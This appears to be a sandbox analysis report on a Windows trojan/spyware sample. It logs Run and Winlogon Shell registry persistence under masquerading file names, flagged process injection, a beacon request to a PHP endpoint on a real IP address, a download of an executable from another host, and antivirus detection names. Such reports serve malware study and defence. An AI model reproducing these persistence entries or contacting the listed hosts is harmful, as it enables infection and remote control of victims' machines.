reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\sensrsvc\SearchProtocolHost.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SearchProtocolHost	reg_value	"C:\Windows\System32\sensrsvc\SearchProtocolHost.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchProtocolHost	reg_value	"C:\Windows\System32\sensrsvc\SearchProtocolHost.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\sensrsvc\SearchProtocolHost.exe", "C:\Users\Default User\WmiPrvSE.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE	reg_value	"C:\Users\Default User\WmiPrvSE.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE	reg_value	"C:\Users\Default User\WmiPrvSE.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\sensrsvc\SearchProtocolHost.exe", "C:\Users\Default User\WmiPrvSE.exe", "C:\PerfLogs\Admin\Stub.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Stub	reg_value	"C:\PerfLogs\Admin\Stub.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stub	reg_value	"C:\PerfLogs\Admin\Stub.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\sensrsvc\SearchProtocolHost.exe", "C:\Users\Default User\WmiPrvSE.exe", "C:\PerfLogs\Admin\Stub.exe", "C:\Sandbox\test22\smss.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\smss	reg_value	"C:\Sandbox\test22\smss.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss	reg_value	"C:\Sandbox\test22\smss.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\sensrsvc\SearchProtocolHost.exe", "C:\Users\Default User\WmiPrvSE.exe", "C:\PerfLogs\Admin\Stub.exe", "C:\Sandbox\test22\smss.exe", "C:\Python27\NEWS\pw.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\pw	reg_value	"C:\Python27\NEWS\pw.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pw	reg_value	"C:\Python27\NEWS\pw.exe"

Network communications indicative of possible code injection originated from the process smss.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send Sept. 27, 2021, 8:16 a.m.	buffer: GET /triggers/vm_.php?mICvfro6PEXVDXrLSnC2C=s6yb&e8f6de43394a8e2ef93b201a0d2ec922=c0280c4c3f572aabfa038560a3f515da&65ab24948c084368808c084126a043f5=gZlFWOwQDMhlTO2kjZ2QjN4MmNiRWZ3UmZyIGZxYTM0QjMxITZmhTY&mICvfro6PEXVDXrLSnC2C=s6yb HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Host: 62.109.1.30 Connection: Keep-Alive socket: 1188 sent: 420	1	420	0
send Sept. 27, 2021, 8:16 a.m.	buffer: GET /DriverGraphDevicea.exe HTTP/1.1 Host: 176.31.32.199 Connection: Keep-Alive socket: 1264 sent: 85	1	85	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2740 resumed a thread in remote process 2624
NtResumeThread Sept. 27, 2021, 8:15 a.m.	thread_handle: 0x0000000000000068 suspend_count: 0 process_identifier: 2624	1	0	0

Generates some ICMP traffic

File has been identified by 45 AntiVirus engines on VirusTotal as malicious (45 events)

Lionic	Trojan.Win32.Generic.4!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 99)
CAT-QuickHeal	Trojan.YakbeexMSIL.ZZ4
McAfee	RDN/Generic PWS.y
Malwarebytes	Spyware.Agent
Sangfor	Suspicious.Win32.Save.a
K7AntiVirus	Riskware ( 0040eff71 )
Alibaba	Trojan:MSIL/Stelega.b4f2417c
K7GW	Riskware ( 0040eff71 )
CrowdStrike	win/malicious_confidence_90% (W)
Arcabit	Trojan.MSIL.Basic.6.Gen
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Spy.Agent.DNM
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan.Win32.Generic
BitDefender	Trojan.MSIL.Basic.6.Gen
MicroWorld-eScan	Trojan.MSIL.Basic.6.Gen
Avast	Win32:TrojanX-gen [Trj]
Tencent	Win32.Trojan.Generic.Dztl
Ad-Aware	Trojan.MSIL.Basic.6.Gen
Emsisoft	Trojan.MSIL.Basic.6.Gen (B)
McAfee-GW-Edition	BehavesLike.Win32.Generic.bh
FireEye	Generic.mg.856543b98724304b
Sophos	Mal/Generic-R + Mal/SpyNoon-A
Ikarus	Trojan.MSIL.Spy
Webroot	W32.Trojan.Gen
Avira	TR/Spy.Agent.fdxsk
Kingsoft	Win32.Troj.Undef.(kcloud)
Microsoft	Trojan:MSIL/Stelega.DN!MTB
ZoneAlarm	HEUR:Trojan.Win32.Generic
GData	Trojan.MSIL.Basic.6.Gen
AhnLab-V3	Trojan/Win.Stelega.C4637774
ALYac	Trojan.MSIL.Basic.6.Gen
MAX	malware (ai score=89)
Cylance	Unsafe
TrendMicro-HouseCall	TROJ_GEN.R002C0DIN21
Yandex	Trojan.Agent!Do6UL1kgmps
SentinelOne	Static AI - Malicious PE
eGambit	Unsafe.AI_Score_97%
Fortinet	W32/Agent.A!tr
BitDefenderTheta	Gen:NN.ZemsilF.34170.Wm0@aurYZpci
AVG	Win32:TrojanX-gen [Trj]
Panda	Trj/GdSda.A

Stub.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All